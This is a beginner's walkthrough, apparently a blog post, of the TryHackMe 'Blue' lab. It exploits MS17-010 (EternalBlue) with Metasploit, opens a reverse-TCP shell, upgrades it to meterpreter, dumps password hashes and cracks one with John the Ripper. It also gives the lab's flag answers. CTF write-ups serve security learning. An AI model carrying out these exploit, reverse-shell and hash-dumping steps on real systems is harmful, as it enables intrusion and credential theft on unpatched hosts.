Hi! It is time to look at the Blue CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/blue
Task 1 (Recon)
Let’s get started with some recon!
Questions
Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
Let’s get started with some port scanning with nmap.
nmap -sV -sC --script vuln 10.10.184.191
The -sV flag adds version detection, the -sC flag runs some default scripts, while the -script flag tries to find some vulnerabilities.
There is a lot to look at! We can see a variety of services running: RPC, NetBIOS, SMB, remote access, and RPC. In addition we can see a vulnerability: smb-vuln-ms17–010, with CVE number CVE-2017–0143.
Answer: No answer needed
How many ports are open with a port number under 1000?
Answer: 3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
Answer: ms17–010
Task 2 (Gain Access)
Exploit the machine and gain a foothold.
Questions
Start Metasploit
Answer: No answer needed
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Well, we know the name of the exploit, and we ware search for modules of the type exploit. So we can enter the following command:
search ms17–010 type:exploit
Considering the name of this room, I will go with the EternalBlue one.
Answer: exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
This is very often RHOSTS, but let’s have a look. Load the module by entering use 0. Then enter show options.
And yes, RHOSTS, which is the target host ip.
Answer: RHOSTS
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
Set the payload (see above), and the RHOSTS option to the target machine ip.
With that done, run the exploit!
Simple type run or exploit.
Answer: No answer needed
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
We got access:
Background the shell by pressing Control+Z and move on to task 3.
Answer: No answer needed
Task 3 (Escalate)
Escalate privileges, learn how to upgrade shells in metasploit.
Questions
If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
I did a simple search for shell and found the following module:
Answer: post/multi/manage/shell_to_meterpreter
Select this (use MODULE_PATH). Show options, what option are we required to change?
Activate the model, and show options.
The answer is SESSION.
Answer: SESSION
Set the required option, you may need to list all of the sessions to find your target here.
In the above screenshot I used sessions -l to see the id of the shell session. Proceed by setting the SESSION to 1 (set SESSION 1).
Answer: No answer needed
Run! If this doesn’t work, try completing the exploit from the previous task once more.
Run the run command.
Enter the sessions -l command once more to see that we have a active Meterpreter session:
It is running on id 2.
Answer: No answer needed
Once the meterpreter shell conversion completes, select that session for use.
Change sessions by writing sessions -i 2.
Answer: No answer needed
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
Let’s run a shell and run whoami. We are indeed system.
Now background the shell, and select the meterpreter session once more.
Answer: No answer needed
List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
Run the ps command.
Pick a system process. I will remember id 2728.
Answer: No answer needed
Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
Simply enter migrate 2728 (or another id you picked).
Migration completed!
Answer: No answer needed
Task 4 (Cracking)
Dump the non-default user’s password and crack it!
Questions
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Now that we have our elevated shell, run hashdump.
In case you are wondering, the hashdump ouput follows the following format:
- Username (Administrator, User1, etc.)
- Relative Identification (RID)
- LM hash
- NTLM hash
The non-default user is Jon.
Answer: Jon
Copy this password hash to a file and research how to crack it. What is the cracked password?
Copy the hash (ffb43f0de35be4d9917ac0cc8ad57f8d) to a file by running:
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt
Let’s use John the Ripper to crack it. I first thought the format would be LM, but it is actually nt.
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
This gives us the answer.
Answer: alqfna22
Task 5 (Find flags!)
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Completed Blue? Check out Ice: Link
You can check out the third box in this series, Blaster, here: Link
Questions
Flag1? This flag can be found at the system root.
Make sure you are still in the meterpreter session. Check you present working directory by entering pwd, followed by moving up (..) twice. List the files in the current directory (ls or dir) and finally read athe flag by running cat flag1.txt.
Answer: flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
Windows password are stored hashed within files in the c:\Windows\System32\Config directory. Change your directory to there in the meterpreter shell:
cd C:/Windows/System32/config
List the files there are read the flag2.txt:
Answer: flag{sam_database_elevated_access}
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
I first thought I had to look into the C:/Users/Administrator folder but this does not exist. But Jon is an administrator so let’s look there.
If we list all files in the Jon directory we do not see any flag. Let’s go into the Documents folder. And bingo!
Answer: flag{admin_documents_can_be_valuable}
We are done! This was fun, and if you followed along with the Metasploit rooms on TryHackMe (I got walkthroughs for those as well!) it shouldn’t have been to difficult 🙂 If you got some benefit from this walkthrough you are welcome to give me some claps.
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: